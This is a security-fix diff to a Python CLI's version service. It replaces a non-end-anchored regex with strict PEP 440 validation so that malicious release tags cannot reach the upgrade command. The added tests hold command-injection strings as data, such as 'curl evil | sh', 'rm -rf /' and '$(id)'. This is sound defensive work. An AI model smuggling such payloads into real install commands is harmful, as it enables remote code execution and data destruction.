diff --git a/src/keboola_agent_cli/services/version_service.py b/src/keboola_agent_cli/services/version_service.py index 0bca7991..6475d678 100644 --- a/src/keboola_agent_cli/services/version_service.py +++ b/src/keboola_agent_cli/services/version_service.py @@ -549,11 +549,20 @@ def _fetch_kbagent_latest_version( ) response.raise_for_status() tag = response.json().get("tag_name", "") - # Strip leading 'v' from tag (e.g. 'v0.16.0' -> '0.16.0') - version = tag.lstrip("v") - if re.match(r"\d+\.\d+\.\d+", version): - return version - return None + # Strip a single leading 'v' (e.g. 'v0.16.0' -> '0.16.0'). + version = tag.removeprefix("v") + # Validate strictly as PEP 440 before the version can flow into the + # install command / URL (resolve_kbagent_wheel_url / + # build_kbagent_upgrade_command). The old `re.match(r"\d+\.\d+\.\d+", ...)` + # was NOT end-anchored, so an adversarial release tag like + # '0.99.0; curl evil | sh' passed on its '0.99.0' prefix and reached + # the upgrade command (GHSA-x6cx-93j8-pgwj). + try: + Version(version) + except InvalidVersion: + logger.warning("Ignoring malformed GitHub release tag %r", tag) + return None + return version except (httpx.HTTPError, KeyError, ValueError): logger.debug("Failed to fetch latest kbagent version", exc_info=True) return None @@ -616,9 +625,16 @@ def _fetch_mcp_latest_version(timeout: float = VERSION_CHECK_TIMEOUT) -> str | N response.raise_for_status() data = response.json() version = data.get("info", {}).get("version", "") - if re.match(r"\d+\.\d+\.\d+", version): - return version - return None + # Same end-anchoring fix as the kbagent path (GHSA-x6cx-93j8-pgwj): the + # MCP version flows into the MCP upgrade command, so validate it strictly + # as PEP 440 rather than matching a bare prefix. PyPI already enforces + # PEP 440, so this is defense-in-depth on the install path. + try: + Version(version) + except InvalidVersion: + logger.warning("Ignoring malformed MCP version %r from PyPI", version) + return None + return version except (httpx.HTTPError, KeyError, ValueError): logger.debug("Failed to fetch latest MCP server version", exc_info=True) return None diff --git a/tests/test_version_service.py b/tests/test_version_service.py index d4ef0d5f..d8f18a57 100644 --- a/tests/test_version_service.py +++ b/tests/test_version_service.py @@ -51,6 +51,17 @@ def test_success(self, mock_get: MagicMock) -> None: assert _fetch_mcp_latest_version() == "1.46.0" + @patch("keboola_agent_cli.services.version_service.httpx.get") + def test_rejects_malformed_pypi_version(self, mock_get: MagicMock) -> None: + """GHSA-x6cx: a malformed PyPI version must be rejected, not accepted on + a valid prefix (defense-in-depth on the MCP upgrade-command path).""" + mock_response = MagicMock() + mock_response.raise_for_status = MagicMock() + mock_get.return_value = mock_response + for bad in ("1.46.0; evil", "1.46.0/../x", "garbage"): + mock_response.json.return_value = {"info": {"version": bad}} + assert _fetch_mcp_latest_version() is None, bad + @patch("keboola_agent_cli.services.version_service.httpx.get") def test_http_error(self, mock_get: MagicMock) -> None: import httpx @@ -836,6 +847,38 @@ def test_default_uses_releases_latest_endpoint(self, mock_get: MagicMock) -> Non url = mock_get.call_args.args[0] assert url.endswith("/releases/latest") + @patch("keboola_agent_cli.services.version_service.httpx.get") + def test_rejects_adversarial_release_tag(self, mock_get: MagicMock) -> None: + """GHSA-x6cx: a tag whose valid version prefix is followed by garbage + must be rejected. The old non-end-anchored ``re.match`` accepted it on + the prefix, letting it flow into the upgrade command.""" + mock_response = MagicMock() + mock_response.raise_for_status = MagicMock() + mock_get.return_value = mock_response + for bad in ( + "v0.99.0; curl evil | sh", + "v0.99.0 && rm -rf /", + "v0.99.0/../../x", + "v0.99.0$(id)", + "v0.99.0evil", + "vgarbage", + ): + mock_response.json.return_value = {"tag_name": bad} + assert _fetch_kbagent_latest_version() is None, bad + + @patch("keboola_agent_cli.services.version_service.httpx.get") + def test_accepts_valid_stable_and_beta_tags(self, mock_get: MagicMock) -> None: + mock_response = MagicMock() + mock_response.raise_for_status = MagicMock() + mock_get.return_value = mock_response + for tag, expected in ( + ("v0.65.1", "0.65.1"), + ("v0.43.0b1", "0.43.0b1"), + ("0.65.2", "0.65.2"), + ): + mock_response.json.return_value = {"tag_name": tag} + assert _fetch_kbagent_latest_version() == expected, tag + @patch("keboola_agent_cli.services.version_service.httpx.get") def test_prerelease_returns_highest_pep440_version(self, mock_get: MagicMock) -> None: """With include_prerelease=True: pick highest by PEP 440 ordering."""